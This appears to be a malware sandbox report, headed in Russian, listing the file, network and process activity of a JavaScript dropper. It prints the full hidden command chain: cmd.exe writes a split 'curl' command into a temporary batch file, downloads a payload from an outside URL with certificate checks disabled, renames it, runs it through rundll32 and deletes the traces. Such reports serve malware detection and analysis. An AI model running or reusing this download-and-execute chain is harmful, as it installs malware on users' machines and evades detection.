Техническая информация
- %TEMP%\delectus.o.bat
- 'ss#.com':80
- http://www.ss#.com/repository/SSLcomRootCertificationAuthorityRSA.crt
- DNS ASK ss#.com
- '<SYSTEM32>\cmd.exe' /c del "<PATH_SAMPLE>.js"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="cu" > "%TEMP%\delectus.o.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo rl "https://seovdetech.com/EFm/815532694" --output "%TEMP%\ratione.r" --ssl-no-revoke --insecure --location >> "%TEMP%\delectus.o.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\delectus.o.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\delectus.o.bat"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ren "%TEMP%\ratione.r" officia.i' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' "%TEMP%\officia.i" Enter' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c del "<PATH_SAMPLE>.js"
- '<SYSTEM32>\cmd.exe' /c echo|set /p="cu" > "%TEMP%\delectus.o.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="cu" 1>"%TEMP%\delectus.o.bat""
- '<SYSTEM32>\cmd.exe' /c echo rl "https://seovdetech.com/EFm/815532694" --output "%TEMP%\ratione.r" --ssl-no-revoke --insecure --location >> "%TEMP%\delectus.o.bat"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\delectus.o.bat"
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\delectus.o.bat"
- '<SYSTEM32>\cmd.exe' /c ren "%TEMP%\ratione.r" officia.i
- '<SYSTEM32>\rundll32.exe' "%TEMP%\officia.i" Enter